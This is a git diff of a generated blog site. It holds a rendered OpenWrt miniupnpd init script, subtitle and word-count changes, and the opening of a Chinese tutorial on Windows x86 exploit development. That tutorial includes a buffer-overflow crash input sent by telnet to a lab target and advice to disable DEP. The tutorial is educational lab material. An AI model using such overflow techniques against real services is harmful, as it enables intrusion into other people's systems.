&gt;&gt;<span class="variable">$tmpconf</span>                                       </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"bitrate_up=<span class="variable">$(($upload * 1024 * 8)</span>)"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                           </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;presentation_url&#125;</span>"</span> ] &amp;&amp; \                                                                      </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"presentation_url=<span class="variable">$&#123;presentation_url&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                         </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;notify_interval&#125;</span>"</span> ] &amp;&amp; \                                                                       </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"notify_interval=<span class="variable">$&#123;notify_interval&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                           </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;clean_ruleset_threshold&#125;</span>"</span> ] &amp;&amp; \                                                               </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"clean_ruleset_threshold=<span class="variable">$&#123;clean_ruleset_threshold&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                           </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;clean_ruleset_interval&#125;</span>"</span> ] &amp;&amp; \                                                                </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"clean_ruleset_interval=<span class="variable">$&#123;clean_ruleset_interval&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                             </span><br><span class="line"></span><br><span class="line">                [ -z <span class="string">"<span class="variable">$uuid</span>"</span> ] &amp;&amp; &#123;                                                                                    </span><br><span class="line">                        uuid=<span class="string">"<span class="variable">$(cat /proc/sys/kernel/random/uuid)</span>"</span>                                                     </span><br><span class="line">                        uci <span class="built_in">set</span> upnpd.config.uuid=<span class="variable">$uuid</span>                                                                </span><br><span class="line">                        uci commit upnpd                                                                               </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ <span class="string">"<span class="variable">$uuid</span>"</span> = <span class="string">"nocli"</span> ] || \                                                                             </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"uuid=<span class="variable">$uuid</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                                   </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;serial_number&#125;</span>"</span> ] &amp;&amp; \                                                                         </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"serial=<span class="variable">$&#123;serial_number&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>                                                      </span><br><span class="line"></span><br><span class="line">                [ -n <span class="string">"<span class="variable">$&#123;model_number&#125;</span>"</span> ] &amp;&amp; \                                               </span><br><span class="line">                        <span class="built_in">echo</span> <span class="string">"model_number=<span class="variable">$&#123;model_number&#125;</span>"</span> &gt;&gt;<span class="variable">$tmpconf</span>        </span><br><span class="line">                        config_foreach conf_rule_add perm_rule <span class="string">"<span class="variable">$tmpconf</span>"</span>                                                          </span><br><span class="line">                    <span class="keyword">fi</span>                                                                                                             </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                    <span class="keyword">if</span> [ -n <span class="string">"<span class="variable">$ifname</span>"</span> ]; <span class="keyword">then</span>                                                                                      </span><br><span class="line">                            <span class="comment"># start firewall                                                                                       </span></span><br><span class="line">                            iptables -L MINIUPNPD &gt;/dev/null 2&gt;/dev/null || fw3 reload                                             </span><br><span class="line"></span><br><span class="line">                            <span class="keyword">if</span> [ <span class="string">"<span class="variable">$logging</span>"</span> = <span class="string">"1"</span> ]; <span class="keyword">then</span>                                                                          </span><br><span class="line">                                    SERVICE_DAEMONIZE=1 \                                                                          </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd <span class="variable">$args</span> -d                                                     </span><br><span class="line">                            <span class="keyword">else</span>                                                                                                   </span><br><span class="line">                                    SERVICE_DAEMONIZE= \                                                                           </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd <span class="variable">$args</span>                                                        </span><br><span class="line">                            <span class="keyword">fi</span>                                                                                                     </span><br><span class="line">                    <span class="keyword">else</span>                                                                                                           </span><br><span class="line">                            logger -t <span class="string">"upnp daemon"</span> <span class="string">"external interface not found, not starting"</span>                                   </span><br><span class="line">                    <span class="keyword">fi</span>                                                                                                             </span><br><span class="line">                    <span class="built_in">return</span> 0                                                                                                       </span><br><span class="line">            &#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line">            <span class="function"><span class="title">stop</span></span>() &#123;                                                                                                               </span><br><span class="line">                    service_stop /usr/sbin/miniupnpd                                                                               </span><br><span class="line"></span><br><span class="line">                    iptables -t nat -F MINIUPNPD 2&gt;/dev/null                                            </span><br><span class="line">                    iptables -t filter -F MINIUPNPD 2&gt;/dev/null                                         </span><br><span class="line">                    <span class="built_in">return</span> 0                                                                            </span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>
+<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br></pre></td><td class="code"><pre><span class="line">!/bin/sh /etc/rc.common</span><br><span class="line"># Copyright (C) 2006-2011 OpenWrt.org</span><br><span class="line"></span><br><span class="line">START=95</span><br><span class="line">SERVICE_USE_PID=1</span><br><span class="line">upnpd_get_port_range() &#123;</span><br><span class="line">        local _var=&quot;$1&quot;; shift</span><br><span class="line">        local _val</span><br><span class="line">        config_get _val &quot;$@&quot;</span><br><span class="line">        case &quot;$_val&quot; in</span><br><span class="line">                [0-9]*[:-][0-9]*)</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_start=$&#123;_val%%[:-]*&#125;&quot;</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_end=$&#123;_val##*[:-]&#125;&quot;</span><br><span class="line">                ;;</span><br><span class="line">                [0-9]*)</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_start=$_val&quot;</span><br><span class="line">                        export -n -- &quot;$&#123;_var&#125;_end=&quot;</span><br><span class="line">                ;;</span><br><span class="line">        esac</span><br><span class="line">&#125;</span><br><span class="line">conf_rule_add() &#123;</span><br><span class="line">        local cfg=&quot;$1&quot;</span><br><span class="line">        local tmpconf=&quot;$2&quot;</span><br><span class="line">        local action external_port_start external_port_end int_addr</span><br><span class="line">        local internal_port_start internal_port_end</span><br><span class="line"></span><br><span class="line">        config_get action &quot;$cfg&quot; action &quot;deny&quot;               # allow or deny</span><br><span class="line">        upnpd_get_port_range &quot;ext&quot; &quot;$cfg&quot; ext_ports &quot;0-65535&quot; # external ports: x, x-y, x:y</span><br><span class="line">        config_get int_addr &quot;$cfg&quot; int_addr &quot;0.0.0.0/0&quot;       # ip or network and subnet mask (internal)</span><br><span class="line">        upnpd_get_port_range &quot;int&quot; &quot;$cfg&quot; int_ports &quot;0-65535&quot; # internal ports: x, x-y, x:y or range</span><br><span class="line"></span><br><span class="line">        # Make a single IP IP/32 so that miniupnpd.conf can use it.</span><br><span class="line">        case &quot;$int_addr&quot; in</span><br><span class="line">                */*) ;;</span><br><span class="line">                *) int_addr=&quot;$int_addr/32&quot; ;;</span><br><span class="line">        esac</span><br><span class="line"></span><br><span class="line">        echo &quot;$&#123;action&#125; $&#123;ext_start&#125;$&#123;ext_end:+-&#125;$&#123;ext_end&#125; $&#123;int_addr&#125; $&#123;int_start&#125;$&#123;int_end:+-&#125;$&#123;int_end&#125;&quot; &gt;&gt;$tmpconf</span><br><span class="line">&#125;</span><br><span class="line">upnpd_write_bool() &#123;                                                                                                   </span><br><span class="line">        local opt=&quot;$1&quot;                                                                                                 </span><br><span class="line">        local def=&quot;$&#123;2:-0&#125;&quot;                                                                                            </span><br><span class="line">        local alt=&quot;$3&quot;                                                                                                 </span><br><span class="line">        local val                                                                                                      </span><br><span class="line"></span><br><span class="line">        config_get_bool val config &quot;$opt&quot; &quot;$def&quot;                                                                       </span><br><span class="line">        if [ &quot;$val&quot; -eq 0 ]; then                                                                                      </span><br><span class="line">                echo &quot;$&#123;alt:-$opt&#125;=no&quot; &gt;&gt; $tmpconf                                                                     </span><br><span class="line">        else                                                                                                           </span><br><span class="line">                echo &quot;$&#123;alt:-$opt&#125;=yes&quot; &gt;&gt; $tmpconf                                                                    </span><br><span class="line">        fi                                                                                                             </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line">boot() &#123;                                                                                                               </span><br><span class="line">        return 0                                                                                                       </span><br><span class="line">&#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line">start() &#123;                                                                                                              </span><br><span class="line">        config_load &quot;upnpd&quot;                                                                                            </span><br><span class="line">        local extiface intiface upload download logging secure enabled natpmp                                          </span><br><span class="line">        local extip port usesysuptime conffile serial_number model_number                                              </span><br><span class="line">        local uuid notify_interval presentation_url enable_upnp                                                        </span><br><span class="line">        local upnp_lease_file clean_ruleset_threshold clean_ruleset_interval                                           </span><br><span class="line"></span><br><span class="line">        config_get extiface config external_iface                                                                      </span><br><span class="line">        config_get intiface config internal_iface                                                                      </span><br><span class="line">        config_get extip config external_ip                                                                            </span><br><span class="line">        config_get port config port 5000                                                                               </span><br><span class="line">        config_get upload   config upload                                                                              </span><br><span class="line">        config_get download config download                                                                            </span><br><span class="line">        config_get_bool logging config log_output 0                                                                    </span><br><span class="line">        config_get conffile config config_file                                                                         </span><br><span class="line">        config_get serial_number config serial_number                                                                  </span><br><span class="line">        config_get model_number config model_number                                                                    </span><br><span class="line">        config_get uuid config uuid                                                                                    </span><br><span class="line">        config_get notify_interval config notify_interval                                                              </span><br><span class="line">        config_get presentation_url config presentation_url                                                            </span><br><span class="line">        config_get upnp_lease_file config upnp_lease_file                                                              </span><br><span class="line">        config_get clean_ruleset_threshold config clean_ruleset_threshold                                              </span><br><span class="line">        config_get clean_ruleset_interval config clean_ruleset_interval                                                </span><br><span class="line"></span><br><span class="line">        local args                                                                                                     </span><br><span class="line"></span><br><span class="line">        . /lib/functions/network.sh        </span><br><span class="line">        local ifname                                                                                                   </span><br><span class="line">        network_get_device ifname $&#123;extiface:-wan&#125;                                                                     </span><br><span class="line"></span><br><span class="line">        if [ -n &quot;$conffile&quot; ]; then                                                                                    </span><br><span class="line">                args=&quot;-f $conffile&quot;                                                                                    </span><br><span class="line">        else                                                                                                           </span><br><span class="line">                local tmpconf=&quot;/var/etc/miniupnpd.conf&quot;                                                                </span><br><span class="line">                args=&quot;-f $tmpconf&quot;                                                                                     </span><br><span class="line">                mkdir -p /var/etc                                                                                      </span><br><span class="line"></span><br><span class="line">                echo &quot;ext_ifname=$ifname&quot; &gt;$tmpconf                                                                    </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$extip&quot; ] &amp;&amp; \                                                                                   </span><br><span class="line">                        echo &quot;ext_ip=$extip&quot; &gt;&gt;$tmpconf                                                                </span><br><span class="line"></span><br><span class="line">                local iface                                                                                            </span><br><span class="line">                for iface in $&#123;intiface:-lan&#125;; do                                                                      </span><br><span class="line">                        local device                                                                                   </span><br><span class="line">                        network_get_device device &quot;$iface&quot; &amp;&amp; &#123;                                                        </span><br><span class="line">                                echo &quot;listening_ip=$device&quot; &gt;&gt;$tmpconf                                                 </span><br><span class="line">                        &#125;                                                                                              </span><br><span class="line">                done                                                                                                   </span><br><span class="line"></span><br><span class="line">                [ &quot;$port&quot; != &quot;auto&quot; ] &amp;&amp; \                                                                             </span><br><span class="line">                        echo &quot;port=$port&quot; &gt;&gt;$tmpconf                                                                   </span><br><span class="line"></span><br><span class="line">                config_load &quot;upnpd&quot;                                                                                    </span><br><span class="line">                upnpd_write_bool enable_natpmp 1                             </span><br><span class="line">                upnpd_write_bool enable_upnp 1                               </span><br><span class="line">                upnpd_write_bool secure_mode 1                               </span><br><span class="line">                upnpd_write_bool system_uptime 1    </span><br><span class="line">                [ -n &quot;$upnp_lease_file&quot; ] &amp;&amp; &#123;                                                                         </span><br><span class="line">                        touch $upnp_lease_file                                                                         </span><br><span class="line">                        echo &quot;lease_file=$upnp_lease_file&quot; &gt;&gt;$tmpconf                                                  </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$upload&quot; -a -n &quot;$download&quot; ] &amp;&amp; &#123;                                                                </span><br><span class="line">                        echo &quot;bitrate_down=$(($download * 1024 * 8))&quot; &gt;&gt;$tmpconf                                       </span><br><span class="line">                        echo &quot;bitrate_up=$(($upload * 1024 * 8))&quot; &gt;&gt;$tmpconf                                           </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;presentation_url&#125;&quot; ] &amp;&amp; \                                                                      </span><br><span class="line">                        echo &quot;presentation_url=$&#123;presentation_url&#125;&quot; &gt;&gt;$tmpconf                                         </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;notify_interval&#125;&quot; ] &amp;&amp; \                                                                       </span><br><span class="line">                        echo &quot;notify_interval=$&#123;notify_interval&#125;&quot; &gt;&gt;$tmpconf                                           </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;clean_ruleset_threshold&#125;&quot; ] &amp;&amp; \                                                               </span><br><span class="line">                        echo &quot;clean_ruleset_threshold=$&#123;clean_ruleset_threshold&#125;&quot; &gt;&gt;$tmpconf                           </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;clean_ruleset_interval&#125;&quot; ] &amp;&amp; \                                                                </span><br><span class="line">                        echo &quot;clean_ruleset_interval=$&#123;clean_ruleset_interval&#125;&quot; &gt;&gt;$tmpconf                             </span><br><span class="line"></span><br><span class="line">                [ -z &quot;$uuid&quot; ] &amp;&amp; &#123;                                                                                    </span><br><span class="line">                        uuid=&quot;$(cat /proc/sys/kernel/random/uuid)&quot;                                                     </span><br><span class="line">                        uci set upnpd.config.uuid=$uuid                                                                </span><br><span class="line">                        uci commit upnpd                                                                               </span><br><span class="line">                &#125;                                                                                                      </span><br><span class="line"></span><br><span class="line">                [ &quot;$uuid&quot; = &quot;nocli&quot; ] || \                                                                             </span><br><span class="line">                        echo &quot;uuid=$uuid&quot; &gt;&gt;$tmpconf                                                                   </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;serial_number&#125;&quot; ] &amp;&amp; \                                                                         </span><br><span class="line">                        echo &quot;serial=$&#123;serial_number&#125;&quot; &gt;&gt;$tmpconf                                                      </span><br><span class="line"></span><br><span class="line">                [ -n &quot;$&#123;model_number&#125;&quot; ] &amp;&amp; \                                               </span><br><span class="line">                        echo &quot;model_number=$&#123;model_number&#125;&quot; &gt;&gt;$tmpconf        </span><br><span class="line">                        config_foreach conf_rule_add perm_rule &quot;$tmpconf&quot;                                                          </span><br><span class="line">                    fi                                                                                                             </span><br><span class="line"></span><br><span class="line"></span><br><span class="line">                    if [ -n &quot;$ifname&quot; ]; then                                                                                      </span><br><span class="line">                            # start firewall                                                                                       </span><br><span class="line">                            iptables -L MINIUPNPD &gt;/dev/null 2&gt;/dev/null || fw3 reload                                             </span><br><span class="line"></span><br><span class="line">                            if [ &quot;$logging&quot; = &quot;1&quot; ]; then                                                                          </span><br><span class="line">                                    SERVICE_DAEMONIZE=1 \                                                                          </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd $args -d                                                     </span><br><span class="line">                            else                                                                                                   </span><br><span class="line">                                    SERVICE_DAEMONIZE= \                                                                           </span><br><span class="line">                                    service_start /usr/sbin/miniupnpd $args                                                        </span><br><span class="line">                            fi                                                                                                     </span><br><span class="line">                    else                                                                                                           </span><br><span class="line">                            logger -t &quot;upnp daemon&quot; &quot;external interface not found, not starting&quot;                                   </span><br><span class="line">                    fi                                                                                                             </span><br><span class="line">                    return 0                                                                                                       </span><br><span class="line">            &#125;                                                                                                                      </span><br><span class="line"></span><br><span class="line">            stop() &#123;                                                                                                               </span><br><span class="line">                    service_stop /usr/sbin/miniupnpd                                                                               </span><br><span class="line"></span><br><span class="line">                    iptables -t nat -F MINIUPNPD 2&gt;/dev/null                                            </span><br><span class="line">                    iptables -t filter -F MINIUPNPD 2&gt;/dev/null                                         </span><br><span class="line">                    return 0                                                                            </span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure>
 <p>SmartController<br>messagingagent</p>
 
       
@@ -897,7 +898,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/05/13/PE-file/index.html b/2019/05/13/PE-file/index.html
index 2c2cace6..9417551a 100644
--- a/2019/05/13/PE-file/index.html
+++ b/2019/05/13/PE-file/index.html
@@ -163,7 +163,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -817,7 +817,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/05/14/pack-and-unpack/index.html b/2019/05/14/pack-and-unpack/index.html
index 9690171b..299829eb 100644
--- a/2019/05/14/pack-and-unpack/index.html
+++ b/2019/05/14/pack-and-unpack/index.html
@@ -172,7 +172,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -739,7 +739,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/07/01/AFL-first-learn/index.html b/2019/07/01/AFL-first-learn/index.html
index df332290..d11a52f7 100644
--- a/2019/07/01/AFL-first-learn/index.html
+++ b/2019/07/01/AFL-first-learn/index.html
@@ -164,7 +164,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -1012,7 +1012,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/07/09/afl-first-try/index.html b/2019/07/09/afl-first-try/index.html
index e80ceecc..8c1ffd7f 100644
--- a/2019/07/09/afl-first-try/index.html
+++ b/2019/07/09/afl-first-try/index.html
@@ -163,7 +163,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -802,7 +802,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">49.9k</span>
+    <span title="Site words total count">50.1k</span>
   
 </div>
 
diff --git a/2019/07/10/x86basic/index.html b/2019/07/10/x86basic/index.html
index e6c45c2a..1b20a36c 100644
--- a/2019/07/10/x86basic/index.html
+++ b/2019/07/10/x86basic/index.html
@@ -79,13 +79,13 @@
 
 
 
-<meta name="description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。 0x00 漏洞利用开发简介（1）需要什么  Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3    函数调用与栈：调用、返回 寄存器与函数">
+<meta name="description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。  0x00 漏洞利用开发简介（1）需要什么  Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3    函数调用与栈：调用、返回 寄存器与函">
 <meta name="keywords" content="二进制,Windows,漏洞">
 <meta property="og:type" content="article">
 <meta property="og:title" content="x86-basic 漏洞利用">
 <meta property="og:url" content="https://cool-y.github.io/2019/07/10/x86basic/index.html">
 <meta property="og:site_name" content="混元霹雳手">
-<meta property="og:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。 0x00 漏洞利用开发简介（1）需要什么  Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3    函数调用与栈：调用、返回 寄存器与函数">
+<meta property="og:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。  0x00 漏洞利用开发简介（1）需要什么  Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3    函数调用与栈：调用、返回 寄存器与函">
 <meta property="og:locale" content="zh-Hans">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/%E6%8D%95%E8%8E%B7.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/%E6%8D%95%E8%8E%B71.png">
@@ -104,10 +104,10 @@
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/231.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png">
 <meta property="og:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/%E6%8D%9511%E8%8E%B7.png">
-<meta property="og:updated_time" content="2019-07-10T09:02:29.682Z">
+<meta property="og:updated_time" content="2019-07-10T11:24:55.927Z">
 <meta name="twitter:card" content="summary">
 <meta name="twitter:title" content="x86-basic 漏洞利用">
-<meta name="twitter:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。 0x00 漏洞利用开发简介（1）需要什么  Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3    函数调用与栈：调用、返回 寄存器与函数">
+<meta name="twitter:description" content="这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。  0x00 漏洞利用开发简介（1）需要什么  Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机–Windows XP sp3    函数调用与栈：调用、返回 寄存器与函">
 <meta name="twitter:image" content="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/%E6%8D%95%E8%8E%B7.png">
 
 
@@ -179,7 +179,7 @@
       </a>
     </div>
       
-        <p class="site-subtitle">多得是，你不知道的事</p>
+        <p class="site-subtitle">没人比我更懂中医#MAGA</p>
       
   </div>
 
@@ -429,7 +429,7 @@
                 </span>
                 
                 <span title="阅读时长">
-                  11 分钟
+                  12 分钟
                 </span>
               
             </div>
@@ -451,6 +451,7 @@
 
       
         <p>这部分是对Window x86平台下的几个典型漏洞利用方式的介绍，从最基础的、没有开启任何保护的漏洞程序入手，然后开启GS，最后通过rop绕过DEP。</p>
+<hr>
 <h1 id="0x00-漏洞利用开发简介"><a href="#0x00-漏洞利用开发简介" class="headerlink" title="0x00 漏洞利用开发简介"></a>0x00 漏洞利用开发简介</h1><p>（1）需要什么</p>
 <ul>
 <li>Immunity Debugger -<a href="http://debugger.immunityinc.com/ID_register.py" target="_blank" rel="noopener">Download</a></li>
@@ -492,12 +493,12 @@
 <p><strong>目标程序:</strong><br><a href="http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target="_blank" rel="noopener">bof-server source code</a><br><a href="http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target="_blank" rel="noopener">bof-server binary for Windows</a><br><strong>usage:</strong><br>服务端<br><code>bof-server.exe 4242</code><br>客户端<br><code>telnet localhost 4242</code><br><code>version</code><br><code>bof-server v0.01</code><br><code>quit</code></p>
 </blockquote>
 <h2 id="漏洞点"><a href="#漏洞点" class="headerlink" title="漏洞点"></a>漏洞点</h2><p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/%E5%9B%BE%E7%89%871.png" alt></p>
-<p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">"print('A' * 1024)"</span></span><br><span class="line">telnet <span class="number">192.168</span><span class="number">.64</span><span class="number">.138</span> <span class="number">4242</span></span><br></pre></td></tr></table></figure></p>
+<p><strong>产生崩溃</strong><br>将输出的1024个A发送给靶机程序<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;print(&apos;A&apos; * 1024)&quot;</span><br><span class="line">telnet 192.168.64.138 4242</span><br></pre></td></tr></table></figure></p>
 <p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/%E5%9B%BE%E7%89%872.png" alt></p>
 <h2 id="关闭防御措施"><a href="#关闭防御措施" class="headerlink" title="关闭防御措施"></a>关闭防御措施</h2><p>使用<strong>PESecurity</strong>检查可执行文件本身的防御措施开启情况<br>注意设置：Set-ExecutionPolicyUnrestricted</p>
 <p><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/%E5%9B%BE%E7%89%873.png" alt></p>
 <p><strong>ASLR和DEP</strong><br>ASLR在xp下不用考虑，DEP可通过修改boot.ini中的nonexecute来完成（AlwaysOff、OptOut）<br><img src="https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/%E5%9B%BE%E7%89%874.png" alt></p>
-<h2 id="整体的攻击流程："><a href="#整体的攻击流程：" class="headerlink" title="整体的攻击流程："></a>整体的攻击流程：</h2><ol>
+<h2 id="整体的攻击流程"><a href="#整体的攻击流程" class="headerlink" title="整体的攻击流程"></a>整体的攻击流程</h2><ol>
